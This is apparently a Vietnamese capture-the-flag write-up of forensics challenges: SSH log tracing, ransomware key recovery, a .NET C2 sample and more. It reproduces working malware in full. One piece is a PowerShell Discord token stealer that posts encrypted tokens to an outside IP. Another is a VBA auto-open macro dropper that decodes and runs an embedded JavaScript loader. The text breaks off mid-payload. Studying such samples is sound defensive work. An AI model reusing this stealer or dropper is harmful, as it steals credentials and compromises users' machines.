        address _msgsender = msg.sender;

        _updateFees(_msgsender);
        IERC20Minimal(underlying).transferFrom(_msgsender, address(this), amount);

        _mint(_msgsender, amount);
    }

    function withdraw(uint256 amount) external {
        address _msgsender = msg.sender;

        if (userRecords[_msgsender].balance < amount) {
            revert InsufficientBalance();
        }

        _updateFees(_msgsender);
        _burn(_msgsender, amount);

        // Send also any fees accumulated to user
        uint256 fees = userRecords[_msgsender].fees;
        if (fees > 0) {
            userRecords[_msgsender].fees = 0;
            amount += fees;
            emit FeesUpdated(underlying, _msgsender, fees);
        }

        IERC20Minimal(underlying).transfer(_msgsender, amount);
    }

    function balanceOf(address account) public view returns (uint256) {
        return userRecords[account].balance;
    }

    // Flash loan EIP
    function maxFlashLoan(address token) external view returns (uint256) {
        if (token != underlying) {
            revert NotSupported(token);
        }
        return IERC20Minimal(token).balanceOf(address(this));
    }

    function flashFee(address token, uint256 amount) external view returns (uint256) {
        if (token != underlying) {
            revert NotSupported(token);
        }
        return _computeFee(amount);
    }

    function flashLoan(IERC3156FlashBorrower receiver, address token, uint256 amount, bytes calldata data)
        external
        returns (bool)
    {
        if (token != underlying) {
            revert NotSupported(token);
        }

        IERC20Minimal _token = IERC20Minimal(underlying);
        uint256 _balanceBefore = _token.balanceOf(address(this));

        if (amount > _balanceBefore) {
            revert InsufficientBalance();
        }

        uint256 _fee = _computeFee(amount);
        _token.transfer(address(receiver), amount);

        if (
            receiver.onFlashLoan(msg.sender, underlying, amount, _fee, data)
                != keccak256("ERC3156FlashBorrower.onFlashLoan")
        ) {
            revert CallbackFailed();
        }

        uint256 _balanceAfter = _token.balanceOf(address(this));
        if (_balanceAfter < _balanceBefore + _fee) {
            revert LoanNotRepaid();
        }

        // Accumulate fees and update feePerShare
        uint256 interest = _balanceAfter - _balanceBefore;
        feePerShare += interest.fixedDivFloor(totalSupply, BONE);

        emit FlashLoanSuccessful(address(receiver), msg.sender, token, amount, _fee);
        return true;
    }

    // Private methods
    function _mint(address to, uint256 amount) private {
        totalSupply += amount;
        userRecords[to].balance += amount;

        emit Transfer(address(0), to, amount);
    }

    function _burn(address from, uint256 amount) private {
        totalSupply -= amount;
        userRecords[from].balance -= amount;

        emit Transfer(from, address(0), amount);
    }

    function _updateFees(address _user) private {
        UserRecord storage record = userRecords[_user];
        uint256 fees = record.balance.fixedMulCeil((feePerShare - record.feePerShare), BONE);

        record.fees += fees;
        record.feePerShare = feePerShare;

        emit FeesUpdated(underlying, _user, fees);
    }

    function _computeFee(uint256 amount) private pure returns (uint256) {
        // 0.05% fee
        return amount.fixedMulCeil(5 * BONE / 10_000, BONE);
    }
}


Setup.sol:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import {LoanPool} from "./LoanPool.sol";
import {Token} from "./Token.sol";

contract Setup {
    LoanPool public immutable TARGET;
    Token public immutable TOKEN;

    constructor(address _user) {
        TOKEN = new Token(_user);
        TARGET = new LoanPool(address(TOKEN));

        TOKEN.approve(address(TARGET), type(uint256).max);
        TARGET.deposit(10 ether);
    }

    function isSolved() public view returns (bool) {
        return (TARGET.totalSupply() == 10 ether && TOKEN.balanceOf(address(TARGET)) < 10 ether);
    }
}


Token.sol:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import {Events} from "./Events.sol";

contract Token is Events {
    string public name = "Token";
    string public symbol = "Tok";
    uint8 public immutable decimals = 18;
    uint256 public totalSupply;
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    constructor(address _user) payable {
        _mint(msg.sender, 10 ether);
        _mint(_user, 1 ether);
    }

    function approve(address spender, uint256 amount) public returns (bool) {
        allowance[msg.sender][spender] = amount;

        emit Approval(msg.sender, spender, amount);

        return true;
    }

    function transfer(address to, uint256 amount) public returns (bool) {
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;

        emit Transfer(msg.sender, to, amount);

        return true;
    }

    function transferFrom(address from, address to, uint256 amount) public returns (bool) {
        allowance[from][msg.sender] -= amount;

        balanceOf[from] -= amount;
        balanceOf[to] += amount;

        emit Transfer(from, to, amount);

        return true;
    }

    function _mint(address to, uint256 amount) private {
        balanceOf[to] += amount;
        totalSupply += amount;

        emit Transfer(address(0), to, amount);
    }

    function _burn(address from, uint256 amount) private {
        balanceOf[from] -= amount;
        totalSupply -= amount;

        emit Transfer(from, address(0), amount);
    }
}

Solution
Viết thế này thôi chứ mình biết giải 🐶 đâu mà 🐧. Hẹn gặp lại vào một ngày mình lỏ hơn 💰

Forensic
An_unusual_sighting
credit: Nex0
Trace log và trả lời câu hỏi sau khi connect tới instance.

What is the IP Address and Port of the SSH Server (IP:PORT)

Dễ thấy nó listen ở port 2221 và khi có connect tới, ta có IP:


Ans: 100.107.36.130:2221


What time is the first successful Login



Ans: 2024-02-13 11:29:50


What is the time of the unusual Login

Tại file bash, ta thấy root có add user mới tên softdev và config hệ thống các thứ. Trace lại ở ssh log, có 2 lần login vào root, đặc biệt là lần thứ 2 match với command whoami trong bash (sussy :D).
Từ đó ta có time của unusual login:

Ans: 2024-02-19 04:00:14


What is the Fingerprint of the attacker's public key

Ngay bên cạnh time đó trong log luôn.

Ans: OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4


What is the first command the attacker executed after logging in

Trace theo thời gian như trên ta đã nói thôi, là whoami

Ans: whoami


What is the final command the attacker executed before logging out

Attacker thoát ssh lúc 2024-02-19 04:38:17, ta có command cuối cùng gần nhất với time này là:

Ans: ./setup

Flag: HTB{B3sT_0f_luck_1n_th3_Fr4y!!}
Confinement
credit: Nex0
Đề cho 1 file ad1, load bằng FTK Imager và phân tích. Trong các folder Document thì file bị encrypt, 1 số file bị sửa mỗi byte đầu nên lúc đó mình chưa hiểu là ransomware kiểu gì:v Trôn VN.
Recent các thứ cũng không có gì, nên mình chuyển qua đọc log.
Tại log Microsoft-Windows-Powershell-Operational, event id 4104 (common:v), mình trace được command:

Sussy XD, sau whoami là 1 loạt các command như sau:























Tổng kết lại là sau khi có shell, attacker check info domain, ip,... tải về zip chứa 1 mớ các exe gì gì đó. Ta có thể xem đầy đủ trong prefetch của 7z:

Attacker chạy 1 số con exe trong đấy, sau đó gỡ Windows Defender đi.
Sau khi chạy 1 số exe trong này, attacker đã xóa file zip và các exe liên quan trong Documents, nên lúc đấy mình không nghĩ ra hướng nào nữa.
Tuy nhiên, attacker chạy xong exe mới gỡ Windows Defender bằng Dism 🐸, điều này hướng mình tới Log Firewall có thể còn thông tin gì đó.
Chính đây là thời điểm Dism Defender:
Ta trace ngược lại 1 ít thời gian:

Ở đây ta thấy con intel.exe trước đó đã bị detect và quarantined. Củng cố hơn cho việc đây là con ransom, tại Powershell log ban nãy, ta có thấy con intel.exe chạy bị lỗi gì đó, Werfault được gọi lên và ghi lại report, tại path Program Data\Microsoft\Windows\WER ta có thể tìm thấy crash folder của intel.exe, tại đó chứa wer report của nó. Original filename là Encrypter.exe =))

Sau khi dạo quanh google 1 đêm, mình đọc được 1 bài này:
Tức là vẫn còn cách để khôi phục. Mình nhận ra tiềm năng từ đây :)), mình bắt đầu google 1 số thứ liên quan và tìm hiểu được rằng, file bị detect sẽ được quarantine vào folder /Program Data/Windows Defender/Quarantine, từ đó người dùng có thể tùy chọn remove hoặc restore file đó.
Mình tìm được tool sau: https://github.com/knez/defender-dump/tree/master
Tiến hành khôi phục thử thôi:

Ngon =)). Tiến hành RE thôi nào.

DotNet enjoyer!
Đầu tiên với hàm Main:

Vì là ransomware, mình sẽ tập trung vào các phần liên quan tới mã hóa thôi. Ta thấy nó tạo 1 object CoreEncrypter với param (passwordHasher.GetHashCode(Program.UID, Program.salt), alert.ValidateAlert(), Program.alertName,Program.email)
Tiếp tục đi vào class passwordHasher, nó nối password và salt vào:

Password ở đây là UID và Salt từ class Program:

Salt:
  

Password: Nó đang được set giá trị là null, nhưng nếu đọc kỹ thì tại hàm Main, biến này cũng được gọi lên để hàm GenerateUserID() gen giá trị rồi assign vào biến đó.
  GenerateUserID():
  
  Hàm này gen ra 1 chuỗi 14 ký tự xen kẽ chuỗi và kí tự thôi.
  Sau khi gen xong, ta thấy nó được truyền vào object Alert với vai trò là AttackID, khi reference, ta dễ dàng thấy AttackID này được nhồi vào Html chứa thông báo tống tiền:
  
  Vào folder bất kì có file bị encrypt rồi mở file HTA lên xem là ta có AttackID, đồng nghĩa với việc ta đã có password :v :
  


Quay trở lại passwordHasher, nó gọi đến Hasher:

Thực hiện concat 2 cái trên ta vừa tìm được, sha512 lại rồi encode base64. Làm tương tự và mình có chuỗi sau:
A/b2e5CdOYWbfxqJxQ/Y4Xl4yj5gYqDoN0JQBIWAq5tCRPLlprP2GC87OXq92v1KhCIBTMLMKcfCuWo+kJdnPA==
Sau khi khởi tạo Object CoreEncrypter xong, tại Main, ta thấy nó gọi tới hàm Enc, và Enc lại gọi tới EncryptFile trong CoreCrypter. Ta cùng xem qua:

Đầu tiên nó derive key nhận vào 3 params:

Key: chính là param 1 truyền vào Object CoreEncrypter, cụ thể là chuỗi base64 ta tính được từ pass và salt ở trên:


A/b2e5CdOYWbfxqJxQ/Y4Xl4yj5gYqDoN0JQBIWAq5tCRPLlprP2GC87OXq92v1KhCIBTMLMKcfCuWo+kJdnPA==


Salt: là byte array trong code kia, mình convert sang hex:


0001010001010000


Iterations:


4953
Ngoài lề, sau khi đọc hết code, mình biết được các file vượt quá size mà nó xác định kia (đoạn if), thì nó chỉ mã hóa byte đầu thôi, điều này cũng clear cho mình hơn tại sao lại có ransomware troll thế :v

Derive key thôi!

Sau đó truncate nó thành 2 phần là key với iv, decrypt aes:

Header PK, decrypt xong rồi. Mở ra và ẵm flag thôi:

Flag: HTB{2_f34r_1s_4_ch01ce_322720914448bf9831435690c5835634}
Data Siege
credit: Nex0
C2 server, extract Exe từ Pcap ra và phân tích thôi :))
Exe .net, mình dùng dnspy.
Ta có salt của đoạn derive key trong hàm encrypt/decrypt sau khi decode là: Very_S3cr3t_S

Derive key, ta có thể tìm thấy password ngay trong code, salt ở bên trên. Ngoài ra còn 1 tham số nữa là Iteration, default value của nó ta có dựa vào đây:
https://referencesource.microsoft.com/#mscorlib/system/security/cryptography/rfc2898derivebytes.cs,78
Value = 1000:

Từ đó ta derive ra bytes sequence như sau:

Truncate nó và decrypt thôi, mình decrypt từng cái 1, tại đây mình có part 2 và part 1: h45b33n_r357


Tại đây chạy powershell với param encode:

Mình decode nó ra, ta sẽ thấy part 3 được set tên cho new schedule task:

Flag: HTB{c0mmun1c4710n5_h45_b33n_r3570r3d_1n_7h3_h34dqu4r73r5}
Fake_Boost
credit: Nex0
Đề cấp 1 file pcapng. Tại tcp.streameq 3, ta thấy nó tải xuống 1 attachment là file ps1 tại dir /freediscordnitro. Cùng phân tích file ps1 này:

Đại khái là reverse xong decode base64 cái biến dài ngoằng ở trên, sau đó iex nó:

Full decoded script:
$URL = "http://192.168.116.135:8080/rj1893rj1joijdkajwda"

function Steal {
    param (
        [string]$path
    )

    $tokens = @()

    try {
        Get-ChildItem -Path $path -File -Recurse -Force | ForEach-Object {

            try {
                $fileContent = Get-Content -Path $_.FullName -Raw -ErrorAction Stop

                foreach ($regex in @('[\w-]{26}\.[\w-]{6}\.[\w-]{25,110}', 'mfa\.[\w-]{80,95}')) {
                    $tokens += $fileContent | Select-String -Pattern $regex -AllMatches | ForEach-Object {
                        $_.Matches.Value
                    }
                }
            } catch {}
        }
    } catch {}

    return $tokens
}

function GenerateDiscordNitroCodes {
    param (
        [int]$numberOfCodes = 10,
        [int]$codeLength = 16
    )

    $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
    $codes = @()

    for ($i = 0; $i -lt $numberOfCodes; $i++) {
        $code = -join (1..$codeLength | ForEach-Object { Get-Random -InputObject $chars.ToCharArray() })
        $codes += $code
    }

    return $codes
}

function Get-DiscordUserInfo {
    [CmdletBinding()]
    Param (
        [Parameter(Mandatory = $true)]
        [string]$Token
    )

    process {
        try {
            $Headers = @{
                "Authorization" = $Token
                "Content-Type" = "application/json"
                "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/91.0.864.48 Safari/537.36"
            }

            $Uri = "https://discord.com/api/v9/users/@me"

            $Response = Invoke-RestMethod -Uri $Uri -Method Get -Headers $Headers
            return $Response
        }
        catch {}
    }
}

function Create-AesManagedObject($key, $IV, $mode) {
    $aesManaged = New-Object "System.Security.Cryptography.AesManaged"

    if ($mode="CBC") { $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC }
    elseif ($mode="CFB") {$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CFB}
    elseif ($mode="CTS") {$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CTS}
    elseif ($mode="ECB") {$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB}
    elseif ($mode="OFB"){$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::OFB}


    $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aesManaged.BlockSize = 128
    $aesManaged.KeySize = 256
    if ($IV) {
        if ($IV.getType().Name -eq "String") {
            $aesManaged.IV = [System.Convert]::FromBase64String($IV)
        }
        else {
            $aesManaged.IV = $IV
        }
    }
    if ($key) {
        if ($key.getType().Name -eq "String") {
            $aesManaged.Key = [System.Convert]::FromBase64String($key)
        }
        else {
            $aesManaged.Key = $key
        }
    }
    $aesManaged
}

function Encrypt-String($key, $plaintext) {
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($plaintext)
    $aesManaged = Create-AesManagedObject $key
    $encryptor = $aesManaged.CreateEncryptor()
    $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
    [byte[]] $fullData = $aesManaged.IV + $encryptedData
    [System.Convert]::ToBase64String($fullData)
}

Write-Host "
______              ______ _                       _   _   _ _ _               _____  _____  _____   ___ 
|  ___|             |  _  (_)                     | | | \ | (_) |             / __  \|  _  |/ __  \ /   |
| |_ _ __ ___  ___  | | | |_ ___  ___ ___  _ __ __| | |  \| |_| |_ _ __ ___   `' / /'| |/' |`' / /'/ /| |
|  _| '__/ _ \/ _ \ | | | | / __|/ __/ _ \| '__/ _` | | . ` | | __| '__/ _ \    / /  |  /| |  / / / /_| |
| | | | |  __/  __/ | |/ /| \__ \ (_| (_) | | | (_| | | |\  | | |_| | | (_) | ./ /___\ |_/ /./ /__\___  |
\_| |_|  \___|\___| |___/ |_|___/\___\___/|_|  \__,_| \_| \_/_|\__|_|  \___/  \_____/ \___/ \_____/   |_/

                                                                                                         "
Write-Host "Generating Discord nitro keys! Please be patient..."

$local = $env:LOCALAPPDATA
$roaming = $env:APPDATA
$part1 = "SFRCe2ZyMzNfTjE3cjBHM25fM3hwMDUzZCFf"

$paths = @{
    'Google Chrome' = "$local\Google\Chrome\User Data\Default"
    'Brave' = "$local\BraveSoftware\Brave-Browser\User Data\Default\"
    'Opera' = "$roaming\Opera Software\Opera Stable"
    'Firefox' = "$roaming\Mozilla\Firefox\Profiles"
}

$headers = @{
    'Content-Type' = 'application/json'
    'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/91.0.864.48 Safari/537.36'
}

$allTokens = @()
foreach ($platform in $paths.Keys) {
    $currentPath = $paths[$platform]

    if (-not (Test-Path $currentPath -PathType Container)) {continue}

    $tokens = Steal -path $currentPath
    $allTokens += $tokens
}

$userInfos = @()
foreach ($token in $allTokens) {
    $userInfo = Get-DiscordUserInfo -Token $token
    if ($userInfo) {
        $userDetails = [PSCustomObject]@{
            ID = $userInfo.id
            Email = $userInfo.email
            GlobalName = $userInfo.global_name
            Token = $token
        }
        $userInfos += $userDetails
    }
}

$AES_KEY = "Y1dwaHJOVGs5d2dXWjkzdDE5amF5cW5sYUR1SWVGS2k="
$payload = $userInfos | ConvertTo-Json -Depth 10
$encryptedData = Encrypt-String -key $AES_KEY -plaintext $payload

try {
    $headers = @{
        'Content-Type' = 'text/plain'
        'User-Agent' = 'Mozilla/5.0'
    }
    Invoke-RestMethod -Uri $URL -Method Post -Headers $headers -Body $encryptedData
}
catch {}

Write-Host "Success! Discord Nitro Keys:"
$keys = GenerateDiscordNitroCodes -numberOfCodes 5 -codeLength 16
$keys | ForEach-Object { Write-Output $_ }

Part 1 ngay trong code, decode base64 ra:
HTB{fr33_N17r0G3n_3xp053d!_
Code này tiến hành AES encrypt payload lại rồi POST lên server, ta đã có key rồi, truncate encrypted payload ra là có IV, decrypt ra thôi:

Decode base64 email ra, ta có part 2:
b3W4r3_0f_T00_g00d_2_b3_7ru3_0ff3r5}
Flag: HTB{fr33_N17r0G3n_3xp053d!_b3W4r3_0f_T00_g00d_2_b3_7ru3_0ff3r5}
Game Invitation
credit: Nex0
Đề cấp cho ta 1 file docm. Check macro luôn thôi nhỉ? Mình dùng olevba.
Full macro script embed trong file:
Function JFqcfEGnc(given_string() As Byte, length As Long) As Boolean
Dim xor_key As Byte
xor_key = 45
For i = 0 To length - 1
given_string(i) = given_string(i) Xor xor_key
xor_key = ((xor_key Xor 99) Xor (i Mod 254))
Next i
JFqcfEGnc = True
End Function

Sub AutoClose() 'delete the js script'
On Error Resume Next
Kill IAiiymixt
On Error Resume Next
Set aMUsvgOin = CreateObject("Scripting.FileSystemObject")
aMUsvgOin.DeleteFile kWXlyKwVj & "\*.*", True
Set aMUsvgOin = Nothing
End Sub

Sub AutoOpen()
On Error GoTo MnOWqnnpKXfRO
Dim chkDomain As String
Dim strUserDomain As String
chkDomain = "GAMEMASTERS.local"
strUserDomain = Environ$("UserDomain")
If chkDomain <> strUserDomain Then

Else

Dim gIvqmZwiW
Dim file_length As Long
Dim length As Long
file_length = FileLen(ActiveDocument.FullName)
gIvqmZwiW = FreeFile
Open (ActiveDocument.FullName) For Binary As #gIvqmZwiW
Dim CbkQJVeAG() As Byte
ReDim CbkQJVeAG(file_length)
Get #gIvqmZwiW, 1, CbkQJVeAG
Dim SwMbxtWpP As String
SwMbxtWpP = StrConv(CbkQJVeAG, vbUnicode)
Dim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD
Dim vTxAnSEFH
    Set vTxAnSEFH = CreateObject("vbscript.regexp")
    vTxAnSEFH.Pattern = "sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa"
    Set I4j833DS5SFd34L3gwYQD = vTxAnSEFH.Execute(SwMbxtWpP)
Dim Y5t4Ul7o385qK4YDhr
If I4j833DS5SFd34L3gwYQD.Count = 0 Then
GoTo MnOWqnnpKXfRO
End If
For Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD
Y5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex
Exit For
Next
Dim Wk4o3X7x1134j() As Byte
Dim KDXl18qY4rcT As Long
KDXl18qY4rcT = 13082
ReDim Wk4o3X7x1134j(KDXl18qY4rcT)
Get #gIvqmZwiW, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j
If Not JFqcfEGnc(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then
GoTo MnOWqnnpKXfRO
End If
kWXlyKwVj = Environ("appdata") & "\Microsoft\Windows"
Set aMUsvgOin = CreateObject("Scripting.FileSystemObject")
If Not aMUsvgOin.FolderExists(kWXlyKwVj) Then
kWXlyKwVj = Environ("appdata")
End If
Set aMUsvgOin = Nothing
Dim K764B5Ph46Vh
K764B5Ph46Vh = FreeFile
IAiiymixt = kWXlyKwVj & "\" & "mailform.js"
Open (IAiiymixt) For Binary As #K764B5Ph46Vh
Put #K764B5Ph46Vh, 1, Wk4o3X7x1134j
Close #K764B5Ph46Vh
Erase Wk4o3X7x1134j
Set R66BpJMgxXBo2h = CreateObject("WScript.Shell")
R66BpJMgxXBo2h.Run """" + IAiiymixt + """" + " vF8rdgMHKBrvCoCp0ulm"
ActiveDocument.Save
Exit Sub
MnOWqnnpKXfRO:
Close #K764B5Ph46Vh
ActiveDocument.Save
End If
End Sub

Code obfuscate bằng tên biến, đọc cũng khá xuôi :v. Đại khái là nó search pattern sWcDWp36x5oIe2hJGnRy1iC92AcdQgO8RLioVZWlhCKJXHRSqO450AiqLZyLFeXYilCtorg0p3RdaoPa trong binary của document đang hoạt động (chính là con docm này). Khi tìm thấy pattern rồi sẽ skip pattern, lấy 13082 data đằng sau modify đi thành code js và chạy.
Mình find index của pattern đó trong binary bằng HxD, sau đó viết 1 script để lấy phần code js ra:
with open("forensics_game_invitation\invitation.docm", "rb") as f:
    data = f.read()

index = 0x1FCB9
js = data[index : index + 13082]
xorkey = 45
newd = [0 for i in range(13082)]

for i in range(len(js)):
    newd.append(js[i] ^ xorkey)
    xorkey = (xorkey ^ 99) ^ (i % 254)

for i in newd:
    print(chr(i), end = "")

Output dính vào nhau khá đau mắt 💀, mình ném lên https://lelinhtinh.github.io/de4js/ để nó format lại cho dễ nhìn:

Full Script Js:
var lVky = WScript.Arguments;
var DASz = lVky(0);
var Iwlh = lyEK();
Iwlh = JrvS(Iwlh);
Iwlh = xR68(DASz, Iwlh);
eval(Iwlh);

function af5Q(r) {
    var a = r.charCodeAt(0);
    if (a === 43 || a === 45) return 62;
    if (a === 47 || a === 95) return 63;
    if (a < 48) return -1;
    if (a < 48 + 10) return a - 48 + 26 + 26;
    if (a < 65 + 26) return a - 65;
    if (a < 97 + 26) return a - 97 + 26
}

function JrvS(r) {
    var a = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    var t;
    var l;
    var h;
    if (r.length % 4 > 0) return;
    var u = r.length;
    var g = r.charAt(u - 2) === "=" ? 2 : r.charAt(u - 1) === "=" ? 1 : 0;
    var n = new Array(r.length * 3 / 4 - g);
    var i = g > 0 ? r.length - 4 : r.length;
    var z = 0;

    function b(r) {
        n[z++] = r
    }
    for (t = 0, l = 0; t < i; t += 4, l += 3) {
        h = af5Q(r.charAt(t)) << 18 | af5Q(r.charAt(t + 1)) << 12 | af5Q(r.charAt(t + 2)) << 6 | af5Q(r.charAt(t + 3));
        b((h & 16711680) >> 16);
        b((h & 65280) >> 8);
        b(h & 255)
    }
    if (g === 2) {
        h = af5Q(r.charAt(t)) << 2 | af5Q(r.charAt(t + 1)) >> 4;
        b(h & 255)
    } else if (g === 1) {
        h = af5Q(r.charAt(t)) << 10 | af5Q(r.charAt(t + 1)) << 4 | af5Q(r.charAt(t + 2)) >> 2;
        b(h >> 8 & 255);
        b(h & 255)
    }
    return n
}

function xR68(r, a) {
    var t = [];
    var l = 0;
    var h;
    var u = "";
    for (var g = 0; g < 256; g++) {
        t[g] = g
    }
    for (var g = 0; g < 256; g++) {
        l = (l + t[g] + r.charCodeAt(g % r.length)) % 256;
        h = t[g];
        t[g] = t[l];
        t[l] = h
    }
    var g = 0;
    var l = 0;
    for (var n = 0; n < a.length; n++) {
        g = (g + 1) % 256;
        l = (l + t[g]) % 256;
        h = t[g];
        t[g] = t[l];
        t[l] = h;
        u += String.fromCharCode(a[n] ^ t[(t[g] + t[l]) % 256])
    }
    return u
}

function lyEK() {
    var r = "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